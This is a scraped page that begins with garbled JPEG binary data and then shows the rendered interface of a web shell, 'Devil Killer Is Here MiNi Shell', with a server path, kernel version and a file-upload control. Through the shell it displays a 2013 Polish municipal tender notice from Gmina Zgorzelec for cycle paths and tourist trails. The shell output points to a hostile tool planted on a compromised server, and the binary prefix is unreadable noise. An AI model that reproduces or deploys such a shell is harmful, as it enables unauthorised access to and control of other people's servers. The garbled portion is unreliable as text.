JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130212/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130212/58326-N-2013.html

<p class="kh_header"><b>Zgorzelec: Zaprojektowanie i wykonanie robót budowlanych w ramach projektu pn. Przygoda z Nysą - zagospodarowanie turystyczne pogranicza polsko-niemieckiego - II etap</b><br>
<b>Numer ogłoszenia: 58326 - 2013; data zamieszczenia: 12.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Zgorzelec , ul. Kościuszki 70, 59-900 Zgorzelec, woj. dolnośląskie, tel. 75 77 21 400, faks 75 77 56 564.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gmina.zgorzelec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zaprojektowanie i wykonanie robót budowlanych w ramach projektu pn. Przygoda z Nysą - zagospodarowanie turystyczne pogranicza polsko-niemieckiego - II etap.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zaprojektowanie oraz budowa traktów pieszo-rowerowych oraz ścieżek rowerowych w Gminie Zgorzelec, wraz z niezbędnymi remontami dróg oraz pracami infrastrukturalnymi, wzdłuż  Nysy Łużyckiej i Zbiornika Witka, stanowiących oś łączącą turystycznie Gminę Zgorzelec z Niemcami i Czechami oraz będących bazą do kompleksowego zagospodarowania turystycznego wraz z oznakowaniem szlaków.
Charakterystyczne parametry określające wielkość obiektu lub zakres robót  budowlanych:
Założenia programowe do prac ETAPU II
1) Prace znakarskie i wyposażeniowe na szlakach turystycznych zgodnie z Koncepcją przebiegu szlaków turystycznych w Gminie Zgorzelec (stanowiącą załącznik nr 3 do PFU)
a) wytyczanie i znakowanie ścieżek edukacyjnych -  ok. 20 km
b) wytyczanie i znakowanie tras Nordic Walking - ok. 50 km
c) wytyczanie i znakowanie szlaków konnych - ok. 50 km
d) wykonanie i zamontowanie na terenie gminy 4 dużych i 7 małych tablic turystycznych z przebiegiem szlaków. 
e) wykonanie i zamontowanie 21 tablic obiektowych przy obiektach krajoznawczych
f) wykonanie i zamontowanie na szlakach turystycznych 10 miejsc odpoczynku z ławką (ławka, kosz, parking na 2 rowery) oraz 10 miejsc odpoczynku ze stołem w tym: 
- 5 szt. - ławka ze stołem, koszt, parking na 4 rowery; 
- 5 szt. - ławka ze stołem, kosz, parking na 4 rowery oraz wiata.
Uwaga: Możliwe odstępstwa od przyjętych parametrów w punktach od a do c:
- dopuszczalne odstępstwa od długości: +- 20%,
2) Budowa ścieżki rowerowej od drogi woj. 352 do zapory na jeziorze Witka ok. 820 m - ścieżka asfaltowa o min. szerokości 2,5 m (na podstawie Rozporządzenie Ministra Transportu i Gospodarki Morskiej z dnia 2 marca 1999 r. w sprawie warunków technicznych, jakim powinny odpowiadać drogi publiczne i ich usytuowanie; Dz. U. Nr 43, poz. 430 oraz innymi obowiązującymi przepisami) przewidziana dla dwukierunkowego ruchu rowerowego. Ścieżkę rowerową należy wykonać wraz z oznakowaniem zgodnie z projektem docelowej organizacji ruchu na drogach publicznych uwzględniający ruch rowerzystów. Przy budowie ścieżki rowerowej należy uwzględnić dodatkowo wykonanie:
- (dz. nr 308/1, obręb Radomierzyce) należy uwzględnić wykonanie nasypu z kruszywa kwalifikowanego wg PN-S- 02205 o miąższości do 2,0 m. 
- Przebudowa istniejącego przepustu pod drogą powiatową (dz. nr 308/1 obręb Niedów) w zakresie wymiany części przelotowej przepustu na rurę karbowaną z PEHD o średnicy 800 mm oraz zwiększenia jego długości do 10,0 m i wykonanie nowych ścianek czołowych żelbetowych wykonywanych na mokro w deskowaniu tradycyjnym. 
- budowa muru oporowego z prefabrykatów betonowych wzdłuż drogi powiatowej na długości ok. 20 m w celu zabezpieczenia skarp istniejącego gruntu na działce nr 43 obręb Niedów.
- Wykonanie wykopu pod mur oporowy z odwozem urobku na składowisko Wykonawcy do 10 km
Uwaga: Możliwe odstępstwa od przyjętych parametrów:
- dopuszczalne odstępstwa od długości w przypadku braku zmiany trasy: +- 5%,
- dopuszczalne odstępstwa od długości w przypadku zmiany trasy: +-10%,
- dopuszczalne odstępstwa od szerokości w szczególnych przypadkach za pisemną zgodą Zamawiającego - zmniejszenie szerokości do 2 m:
3) Budowa traktu pieszo-rowerowego (Obręb Ręczyn) - ok. 1478 m nawierzchnia z kruszywa łamanego stabilizowanego mechanicznie
3.1) szerokość traktu: min. 2,5 m dla ruchu pieszo-rowerowego (ok. 759 m) 
3.2) szerokość traktu: min. 3,0 m dla ruchu pojazdów kołowych (ok. 719 m)
Uwaga: Możliwe odstępstwa od przyjętych długości:
- dopuszczalne odstępstwa od długości w przypadku braku zmiany trasy: +- 5%,
- dopuszczalne odstępstwa od długości w przypadku zmiany trasy: +-10%,
- dopuszczalne odstępstwa od szerokości w szczególnych przypadkach za pisemną zgodą Zamawiającego zmniejszenie szerokości traktu  do 2 m (pkt. 3.1)  i do 2,5 m (pkt. 3.2)
4) Budowa traktu pieszo-rowerowego (Obręb Spytków) - ok. 653 m - (nawierzchnia z kruszywa łamanego stabilizowanego mechanicznie - o minimalnej szerokość traktu: 2,5 m dla ruchu pieszo-rowerowego. Na odcinku od granicy zabudowy m. Spytków do końca działki nr 147/1  trakt powinien posiadać nawierzchnię bitumiczną oddzieloną od drogi powiatowej krawężnikiem najazdowym 15x22 cm.
Uwaga: Możliwe odstępstwa od przyjętych długości:
- dopuszczalne odstępstwa od długości w przypadku braku zmiany trasy: +- 5%,
- dopuszczalne odstępstwa od długości w przypadku zmiany trasy: +-20%,
- dopuszczalne odstępstwa od szerokości w szczególnych przypadkach za pisemną zgodą Zamawiającego zmniejszenie szerokości traktu  do 2 m
5) Budowa traktu pieszo-rowerowego, o charakterze rekreacyjno - edukacyjnym, wzdłuż Nysy Łużyckiej od granicy Miasta Zgorzelec do Jędrzychowic ok. 1311 m - nawierzchnia z kruszywa łamanego stabilizowanego mechanicznie,
5.1) o min. szerokości 2,5 m dla ruchu pieszo-rowerowego (ok. 784 m) 
5.2) o min. szerokości 3,0 m dla ruchu pojazdów kołowych, (ok. 527 m) 
Uwaga: Możliwe odstępstwa od przyjętych długości:
- dopuszczalne odstępstwa od długości w przypadku braku zmiany trasy: +- 5%,
- dopuszczalne odstępstwa od długości w przypadku zmiany trasy: +-20%,
- dopuszczalne odstępstwa od szerokości w szczególnych przypadkach za pisemną zgodą Zamawiającego zmniejszenie szerokości traktu  do 2 m (pkt. 5.1)  i do 2,5 m (pkt. 5.2)
6) Budowa traktu pieszo-rowerowego, o charakterze rekreacyjno edukacyjnym, stanowiącego dojazd do miejsca wejścia/wyjścia w Jędrzychowicach (ok. 164 m) - nawierzchnia z kruszywa łamanego stabilizowanego mechanicznie o minimalnej szerokości 3,0 m dla ruchu pojazdów kołowych
Uwaga: Możliwe odstępstwa od przyjętych długości:
- dopuszczalne odstępstwa od długości w przypadku braku zmiany trasy: +- 5%,
- dopuszczalne odstępstwa od długości w przypadku zmiany trasy: +-20%,
- dopuszczalne odstępstwa od szerokości w szczególnych przypadkach za pisemną zgodą Zamawiającego zmniejszenie szerokości traktu  do 2,5 m 
7) Remont kładki pieszo-rowerowej o  długości ok. 15 m na Potoku Jędrzychowickim. 
W związku z brakiem intensywnego użytkowania terenu oraz bliskim sąsiedztwem lasów, obszar opracowania porośnięty jest samosiejkami. 
Etap II Trakt pieszo - rowerowy oraz ścieżka rowerowa przebiegać będzie przez miejscowości: 1. Jędrzychowice; 2. Radomierzyce; 3. Ręczyn; 4. Niedów; 5. Spytków.
Wytyczanie szklaków turystycznych wykonywane będzie na obszarze Gminy Zgorzelec zgodnie z Koncepcją przebiegu szlaków turystycznych (stanowiącą załącznik do PF-U).
Szczegółowy opis prac opisuje Program Funkcjonalno-Użytkowy wraz z załącznikami..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających do 50% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.62-2, 45.22.11.00-3, 71.32.00.00-7, 45.42.20.00-1, 34.92.84.72-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wysokość wadium ustala się w kwocie 15.000 złotych (słownie : piętnaście tysięcy złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia przez Wykonawcę warunku zgodnie z formułą /spełnia/- /nie spełnia/. Warunkiem spełnienia jest złożenie oświadczenia o spełnieniu warunków udziału w postępowaniu określonym przepisami art. 22 ust. 1 ustawy Pzp - zał. nr 2 (W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej wykonawców oświadczenie składa pełnomocnik upoważniony do reprezentowania ich w postępowaniu)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia przez Wykonawcę warunku zgodnie z formułą /spełnia/- /nie spełnia/. Opis sposobu dokonywania oceny spełniania tego warunku (w przypadku  wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniane będzie ich łączne doświadczenie - w tym celu dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie tego warunku):
- Wykonawca winien wykazać, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał zgodnie z zasadami sztuki budowlanej i prawidłowo ukończył co najmniej jedną inwestycję budowlaną polegającą na budowie/przebudowie/remoncie drogi, traktu lub ścieżki rowerowej o długości nie mniejszej niż 3 km i szerokości nie mniejszej niż 2 m; 
- Wykonawca winien wykazać, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:
a) wykonał co najmniej jedną usługę polegającą na znakowaniu szlaków turystycznych (np. rowerowych, pieszych, konnych, nordic walking) zgodnie z Instrukcją PTTK o długości nie mniejszej niż 50 km.
b) wykonał co najmniej jedno zamówienie polegające na wykonaniu/ dostawie drewnianej infrastruktury turystycznej (np. tablice turystyczne, wiaty, miejsca odpoczynku turystów) na kwotę min. 30.000,00 zł. (netto). 
W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć wykaz wykonanych robót i usług sporządzony według wzoru stanowiącego załącznik nr 4 do niniejszej SIWZ oraz dokumenty potwierdzające, że roboty budowlane zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone a usługi zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia przez Wykonawcę warunku zgodnie z formułą /spełnia/- /nie spełnia/. Warunkiem spełnienia jest złożenie oświadczenia o spełnieniu warunków udziału w postępowaniu określonym przepisami art. 22 ust. 1 ustawy Pzp - zał. nr 2 (W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej wykonawców oświadczenie składa pełnomocnik upoważniony do reprezentowania ich w postępowaniu).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia przez Wykonawcę warunku zgodnie z formułą /spełnia/- /nie spełnia/. Opis sposobu dokonywania oceny spełniania tego warunku:
a) w zakresie zespołu projektowego - dysponowanie jedną osobą z uprawnieniami do projektowania w specjalności konstrukcyjno-budowlanej oraz jedną osobą z uprawnieniami do projektowania w specjalności drogowej.
b) w zakresie zespołu realizującego zamówienie - dysponowanie jedną osobą do pełnienia funkcji kierownika budowy posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w branży drogowej 
- wraz z podaniem informacji o dysponowaniu tymi osobami poprzez wypełnienie i podpisanie załącznika nr 5 do SIWZ.
Uwaga! Zamawiający uzna powyższy warunek za spełniony również wtedy jeżeli jedna osoba będzie posiadała kwalifikacje w kilku specjalnościach.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia przez Wykonawcę warunku zgodnie z formułą /spełnia/- /nie spełnia/. Opis sposobu dokonywania oceny spełniania tego warunku:
posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności w wysokości co najmniej 500 tys. zł.  
W celu potwierdzenia spełniania niniejszego warunku Wykonawca musi złożyć opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz Oferty, sporządzony na podstawie wzoru stanowiącego załącznik nr 1 do niniejszej SIWZ,
2. W przypadku Wykonawców, którzy dysponują zasobem osób trzecich, pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia - Wzór zobowiązania stanowi załącznik nr 6 do niniejszej SIWZ.
3. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego. 
4. dowód wniesienia wadium w przypadku wniesienia wadium w pieniądzu - do oferty należy dołączyć kopię polecenia przelewu natomiast w przypadku złożenia wadium w innej formie kopię oryginału dokumentu potwierdzającego wniesienie wadium.
5. Wypełnione zestawienie rzeczowo-finansowe na podstawie wzoru stanowiącego załącznik nr 7 do niniejszej SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Możliwość wprowadzenia zmian umowy przy zachowaniu ceny umowy, może wystąpić w następujących przypadkach:
1. w przypadku zmian organizacyjnych stron np.: zmiana reprezentacji, adresu siedziby Firmy, zmiany kierownika robót lub inspektora nadzoru;
2. w przypadku zmiany kluczowych specjalistów, przedstawionych w ofercie, jedynie za uprzednią pisemną zgodą Zamawiającego, akceptującego nowego kluczowego specjalistę.
2.1 Wykonawca z własnej inicjatywy proponuje zmianę kluczowych specjalistów  w następujących przypadkach:
2.1.1	śmierci, choroby lub zdarzeń losowych kluczowego specjalisty,
2.1.2	nie wywiązywania się kluczowego specjalisty z obowiązków wynikających   z umowy.
2.1.3	Jeżeli zmiana kluczowego specjalisty stanie się konieczna z jakichkolwiek innych przyczyn niezależnych od Wykonawcy (np. rezygnacji),
2.2 Zamawiający może zażądać od Wykonawcy zmiany kluczowego specjalisty, jeżeli uzna, że kluczowy  specjalista nie wykonuje swoich obowiązków wynikających z umowy. Wykonawca obowiązany jest zmienić  kluczowego specjalistę zgodnie z żądaniem Zamawiającego w terminie wskazanym we wniosku Zamawiającego. W przypadku zmiany kluczowego specjalisty  nowy kluczowy specjalista musi spełniać wymagania określone dla danego specjalisty.
3. w zakresie częściowych terminów i terminu końcowego 
- w przypadku błędów lub braków projektowych (z winy projektanta lub nie) jest konieczna zmiana technologii wykonania robót budowlanych, 
- gdy wykonanie zamówień dodatkowych  spowoduje uzasadnione przedłużenie terminu realizacji zamówienia,  
- z powodu okoliczności siły wyższej np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewiedzieć z pewnością w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach,
- z powodu złych warunków atmosferycznych uniemożliwiających realizację zamówienia potwierdzonych przez Inspektora Nadzoru wpisem do Dziennika Budowy,
- z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron.
- jeśli dotrzymanie terminu wskazanego pierwotnie okazało się niemożliwe z powodów, za które nie ponosi odpowiedzialności Wykonawca, w szczególności wniesienia przez Zamawiającego istotnej zmiany do projektu, na podstawie którego Wykonawca wykonuje przedmiot umowy lub wprowadzenia robót zamiennych;
4. Zmiany podwykonawcy i/lub części wykonywanego przez niego zakresu robót, bądź wprowadzenia nowego podwykonawcy;
5. W zakresie płatności:
- zmianie mogą ulec terminy płatności ujęte w harmonogramie rzeczowo-finansowym stanowiącym załącznik nr 2 do Umowy - jeżeli nastąpiła zmiana terminu częściowego lub końcowego. 
- zmianie mogą ulec podziały płatności częściowych jeśli ich wprowadzenie będzie korzystne dla realizacji zamówienia poprzez np. technologiczne uzasadnienie zmiany, usprawnienie realizacji zamówienia, potwierdzone przez Inspektora Nadzoru, Kierownika budowy i zaakceptowane przez Zamawiającego.
6. Zamawiający przewiduje możliwość zmiany umowy, w przypadku gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.gmina.zgorzelec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Zgorzelec ul. Kościuszki 70, 59-900 Zgorzelec (pok. nr 9).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.02.2013 godzina 10:00, miejsce: Urząd Gminy Zgorzelec ul. Kościuszki 70, 59-900 Zgorzelec (Biuro Obsługi Klienta).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany jest ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Współpracy Transgranicznej Polska-Saksonia 2007-2013.</p>
